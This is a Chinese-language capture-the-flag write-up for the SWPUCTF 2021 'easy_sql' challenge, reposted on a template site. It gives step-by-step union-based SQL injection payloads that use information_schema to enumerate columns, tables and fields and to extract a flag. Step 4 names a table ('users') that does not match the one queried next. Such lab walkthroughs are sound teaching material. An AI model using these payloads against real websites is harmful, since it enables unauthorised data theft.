拿到题目,查看源码,可知是要输入参数wllm。
输入参数/?wllm=1,得到会显
继续输入参数/?wllm=1',报错,确定为字符型漏洞
1.查看字段列表,发现在字段4报错,确定为3列
?wllm=-1' order by 3--+
?wllm=-1' order by 4--+
2.查看回显
?wllm=-1' union select 1,2,3--+
3.查询数据库名(test_db)
?wllm=-1' union select 1,2,database()--+
4.查看test_db库的表(users)
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
5.查询字段
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
6.出现flag字段,查看flag字段的内容
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
文章来源:https://www.toymoban.com/news/detail-698756.html
出现flag字段,成功解出文章来源地址https://www.toymoban.com/news/detail-698756.html
到了这里,关于字符型注入([SWPUCTF 2021 新生赛]easy_sql)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!